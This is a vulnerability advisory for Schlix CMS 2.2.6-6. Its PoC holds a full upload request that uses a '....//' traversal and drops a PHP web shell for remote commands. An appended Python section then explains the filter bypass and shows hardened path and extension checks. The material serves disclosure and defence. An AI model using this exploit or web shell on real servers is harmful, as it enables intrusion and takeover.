Schlix CMS 2.2.6-6 Shell Upload / Directory Traversal

2021.05.25
Credit: Emir Polat
Risk: High
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Schlix CMS 2.2.6-6 - Arbitrary File Upload And Directory Traversal Leads To RCE (Authenticated)
# Date: 21.05.2021
# Exploit Author: Emir Polat
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html
# Version: 2.2.6-6
# Tested On: Ubuntu 20.04 (Firefox)

############################################################################################################

Summary:

An authorized user can upload a file with a .phar extension to a path of his choice and control its content as he wishes. This results in remote code execution (RCE).

For full technical details and source code analysis: https://anatolias.medium.com/schlix-cms-v2-2-6-6-c17c5b2f29e

############################################################################################################

PoC:

1-) Log in to the admin panel with valid credentials and go to the "Tools -> Mediamanager" menu on the left side.
2-) Click "Upload File", upload a file and catch the request with Burp.
3-) Change "uploadstartpath", "filename" and the file content as follows.

# Request

POST /schlix/admin/app/core.mediamanager?&ajax=1&action=upload HTTP/1.1
Host: vulnerable-server
Content-Length: 846
X-Schlix-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybllOFLruz1WAs7K2
Accept: */*
Origin: http://vulnerable-server
Referer: http://vulnerable-server/schlix/admin/app/core.mediamanager
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: core-mediamanager_currentCategory=%2Fmedia%2Fpdf; schlix-your-cookie;__atuvc=5%7C20; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
Connection: close

------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="_csrftoken"

{your_csrf_token}
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="uploadstartpath"

/media/docs/....//....//....//....//system/images/avatars/large/
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata[]"; filename="shell.phar"

<?PHP system($_GET['rce']);?>
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata__total_file_size"

0
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata__max_file_count"

20
------WebKitFormBoundarybllOFLruz1WAs7K2--

4-) Go to "vulnerable-server/schlix/system/images/avatars/large/shell.phar?rce=ls".
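The "uploadstartpath" value in the request uses the "....//" pattern, which is what typically defeats a filter that removes "../" in a single pass (one removal leaves "../" behind). The Python below is an added illustration, not code from the advisory or from Schlix: it contrasts that weak filter with a normalize-then-contain check plus an extension allowlist that never stores .phar. The install root, upload root and allowed extensions are constructed assumptions.

```python
import posixpath
from typing import Optional

# Constructed sample values for this example, not taken from the Schlix code base:
# the directory the CMS is installed in and the only tree uploads may land in.
WEB_ROOT = "/var/www/html/schlix"
UPLOAD_ROOT = "media/docs"
# Extensions the media manager is willing to store. Anything the PHP handler
# executes (.php, .phtml, .phar, ...) is simply absent from the allowlist.
ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "jpeg", "gif", "txt"}
# The uploadstartpath from the advisory's request, kept for the checks below.
ADVISORY_START_PATH = "/media/docs/....//....//....//....//system/images/avatars/large/"

def naive_strip(start_path: str) -> str:
    """Weak filter: remove '../' in a single pass. '....//' survives as '../'
    because the inner '../' is cut out and the leftovers re-join around it."""
    return start_path.replace("../", "")

def naive_destination(start_path: str, filename: str) -> str:
    """Where a filter-then-join implementation ends up writing the file."""
    return posixpath.normpath(
        posixpath.join(WEB_ROOT, naive_strip(start_path).lstrip("/"), filename)
    )

def resolve_upload_dir(start_path: str) -> Optional[str]:
    """Hardened check: normalize first, then require the result to stay inside
    UPLOAD_ROOT. No string stripping is attempted at all."""
    allowed = posixpath.normpath(posixpath.join(WEB_ROOT, UPLOAD_ROOT))
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, start_path.lstrip("/")))
    if candidate == allowed or candidate.startswith(allowed + "/"):
        return candidate
    return None

def safe_filename(filename: str) -> Optional[str]:
    """Keep only the base name and allowlist its extension."""
    base = posixpath.basename(filename.replace("\\", "/"))
    if base.startswith(".") or "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    return base if ext in ALLOWED_EXTENSIONS else None

def hardened_destination(start_path: str, filename: str) -> Optional[str]:
    """Final path for the upload, or None when either check rejects it."""
    directory = resolve_upload_dir(start_path)
    name = safe_filename(filename)
    if directory is None or name is None:
        return None
    return posixpath.join(directory, name)
```

With the naive filter the advisory's path and "shell.phar" resolve to a directory four levels above the upload root; the hardened version rejects the same request on the extension alone, and rejects a real "../" path on containment even when the extension is allowed.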


Copyright 2021, cxsecurity.com